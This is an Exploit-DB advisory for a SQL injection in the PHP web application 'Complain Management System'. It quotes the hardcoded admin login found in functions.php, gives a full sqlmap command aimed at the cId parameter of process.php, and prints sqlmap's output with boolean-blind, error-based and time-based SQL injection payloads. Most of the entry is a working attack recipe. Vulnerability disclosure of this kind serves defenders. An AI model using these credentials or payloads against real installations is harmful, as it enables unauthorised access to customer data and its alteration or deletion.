Complain Management System - SQL injection

EDB-ID:

41131

CVE:

N/A

EDB Verified:

Author:

Sibusiso Sishi

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2017-01-20

Vulnerable App: 
# Title : Complain Management System SQL Injection
# Date: 20 January 2017
# Exploit Author: Sibusiso Sishi sibusiso@ironsky.co.za
# Tested on: Windows7 x32
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files
 
#################################################

## About The Product : ##
Complain Management is a Web based project used to manage Customer's complain Online. User can login, and Create complain, view complain details and track the status of its complain.

## Vulnerability : ## 
The functions.php file line 88 has hardcoded admin credentials.
		elseif($uType == 'admin'){
			//$_SESSION['user_id'] = $row['sid'];
			if($userName == 'admin' && $password == 'admin123'){
				$_SESSION['user_id'] = 0;
				$_SESSION['user_name'] = 'Administrator';
				$_SESSION['user_type'] = 'admin';
				header('Location: '.WEB_ROOT.'index.php');
				exit;

Using the hardcoded admin credentials we then have access to the process.php file that is vulnerable to SQL injection.

-HTTP Method : GET

- Sqlmap command: sqlmap -u "http://192.168.19.135/cms/process.php?action=deleteCust&cId=123" --cookie="PHPSESSID=q446r5fqav1qlljb7cohd29r85"

- Sqlmap Output : 
sqlmap identified the following injection point(s) with a total of 622 HTTP(s) requests:
---
Parameter: cId (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: action=deleteCust&cId=123 RLIKE (SELECT (CASE WHEN (8336=8336) THEN 123 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: action=deleteCust&cId=123 AND EXTRACTVALUE(8194,CONCAT(0x5c,0x7171706a71,(SELECT (ELT(8194=8194,1))),0x716a6b6271))

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=deleteCust&cId=123 AND (SELECT * FROM (SELECT(SLEEP(5)))fdmM)
---
[22:54:32] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.6.24
back-end DBMS: MySQL >= 5.1
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services